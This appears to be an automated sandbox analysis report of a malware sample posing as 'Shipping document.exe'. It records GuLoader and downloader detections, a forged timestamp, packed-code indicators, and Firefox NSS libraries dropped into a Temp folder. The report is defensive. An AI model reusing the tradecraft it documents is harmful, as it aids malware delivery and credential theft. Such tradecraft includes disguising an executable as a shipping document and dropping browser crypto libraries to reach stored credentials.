            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392702790.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Shipping document.exe, 00000001.00000003.392772745.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392869610.000000001EF74000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nss3.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
            Source: Binary string: ucrtbase.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392869610.000000001EF74000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392772745.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, mozglue.dll.1.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392644017.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, freebl3.dll.1.dr
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: msvcp140.i386.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392702790.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
            Source: Binary string: ucrtbase.pdbUGP source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, ucrtbase.dll.1.dr
            Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Shipping document.exe, 00000001.00000003.392772745.000000001EF78000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
            Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.392869610.000000001EF74000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, softokn3.dll.1.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
            Source: Binary string: vcruntime140.i386.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, nssdbm3.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.397581318.000000001EB50000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Shipping document.exe, 00000001.00000003.396832360.000000001F830000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422807733.000000001EF90000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Shipping document.exe, 00000001.00000003.398005845.000000001EB70000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Shipping document.exe, 00000001.00000002.422845215.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.418079486.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shipping document.exe PID: 7044, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shipping document.exe PID: 7132, type: MEMORY
            Binary contains a suspicious time stampShow sources
            Source: initial sampleStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Source: initial sampleStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: Shipping document.exe PID: 7044, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Shipping document.exe PID: 7132, type: MEMORY
            Source: Shipping document.exeStatic PE information: real checksum: 0x2029d should be: 0x16376
            Source: Shipping document.exeStatic PE information: real checksum: 0x2029d should be: 0x16376
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0040406B push ds; ret 0_2_0040425E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00406CD5 push ds; ret 0_2_00406CD6
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00408091 push ds; ret 0_2_004080A2
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0040596A push FFFFFF80h; retf 0_2_004059C2
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00407509 push FFFFFF80h; retf 0_2_00407546
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0040412B push ds; ret 0_2_0040425E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_004091FC push edx; iretd 0_2_004091F7
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00409183 push edx; iretd 0_2_004091F7
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00405E75 push ds; ret 0_2_00405E76
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00409684 push edx; iretd 0_2_0040968B
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_004056A1 push ds; ret 0_2_004056A2
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00409EB5 push 528716C7h; iretd 0_2_00409EBB
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00406FC6 push edx; iretd 0_2_00406FC7
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00409B86 push 9A01635Eh; retf 0_2_00409B96
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00407FB5 push edx; iretd 0_2_00407FBB
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210C02 push FFFFFFB9h; retf 0_2_02210C09
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02217557 push 524B9F7Bh; ret 0_2_0221755D
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0040406B push ds; ret 0_2_0040425E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00406CD5 push ds; ret 0_2_00406CD6
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00408091 push ds; ret 0_2_004080A2
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0040596A push FFFFFF80h; retf 0_2_004059C2
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00407509 push FFFFFF80h; retf 0_2_00407546
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_0040412B push ds; ret 0_2_0040425E
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_004091FC push edx; iretd 0_2_004091F7
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00409183 push edx; iretd 0_2_004091F7
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00405E75 push ds; ret 0_2_00405E76
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00409684 push edx; iretd 0_2_0040968B
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_004056A1 push ds; ret 0_2_004056A2
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00409EB5 push 528716C7h; iretd 0_2_00409EBB
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00406FC6 push edx; iretd 0_2_00406FC7
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00409B86 push 9A01635Eh; retf 0_2_00409B96
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_00407FB5 push edx; iretd 0_2_00407FBB
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02210C02 push FFFFFFB9h; retf 0_2_02210C09
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 0_2_02217557 push 524B9F7Bh; ret 0_2_0221755D
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_00061C0F push esp; ret 1_3_00061C11
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_0006244F pushfd ; iretd 1_3_0006240B
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_00065496 pushfd ; iretd 1_3_0006549B
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_000658EB push ds; retf 1_3_000658FD
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_000654F5 pushfd ; retf 1_3_000654F6
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_000648FD push esp; ret 1_3_000648FE
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_00064D18 push esp; iretw 1_3_00064D42
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_0006113B pushfd ; retf 1_3_0006113F
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_00064D7C push esp; iretw 1_3_00064D42
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_00064DA8 push esp; iretw 1_3_00064D42
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_000615C1 pushfd ; iretd 1_3_000615CB
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_000645CA pushfd ; retf 1_3_000645CB
            Source: C:\Users\user\Desktop\Shipping document.exeCode function: 1_3_000623FA pushfd ; iretd 1_3_0006240B
            Source: initial sampleStatic PE information: section name: .text entropy: 7.13058537401
            Source: initial sampleStatic PE information: section name: .text entropy: 7.13058537401
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\msvcp140.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\freebl3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\nssdbm3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\nss3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
